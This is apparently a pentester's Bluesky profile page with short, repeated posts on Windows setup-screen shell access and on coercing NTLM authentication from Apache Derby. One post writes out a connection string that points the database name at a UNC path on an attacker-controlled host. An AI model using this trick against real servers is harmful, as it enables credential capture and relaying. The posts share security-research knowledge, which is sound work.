bka
@bka-sec.bsky.social
Infosec enthusiast, Pentester, Network Security, PCAP or didn't happen, Monkey Island addict
The old and well-known way to spawn a shell in Windows OOBE is the Shift+F10 hotkey. But did you know there is another way, even when Shift+F10 is disabled? You could find more details in the blog post on blog.kanbach.org/post/windows....
#infosec #oobe #Intune #Windows
#infosec #oobe #Intune #Windows
August 12, 2025 at 9:27 AM
The old and well-known way to spawn a shell in Windows OOBE is the Shift+F10 hotkey. But did you know there is another way, even when Shift+F10 is disabled? You could find more details in the blog post on blog.kanbach.org/post/windows....
#infosec #oobe #Intune #Windows
#infosec #oobe #Intune #Windows
If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for fun with NTLM relaying.
The connection string looks like this:
jdbc:derby://<target>:1527/\\attacker\foobar;create=false
The connection string looks like this:
jdbc:derby://<target>:1527/\\attacker\foobar;create=false
November 29, 2024 at 6:42 PM
If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for fun with NTLM relaying.
The connection string looks like this:
jdbc:derby://<target>:1527/\\attacker\foobar;create=false
The connection string looks like this:
jdbc:derby://<target>:1527/\\attacker\foobar;create=false
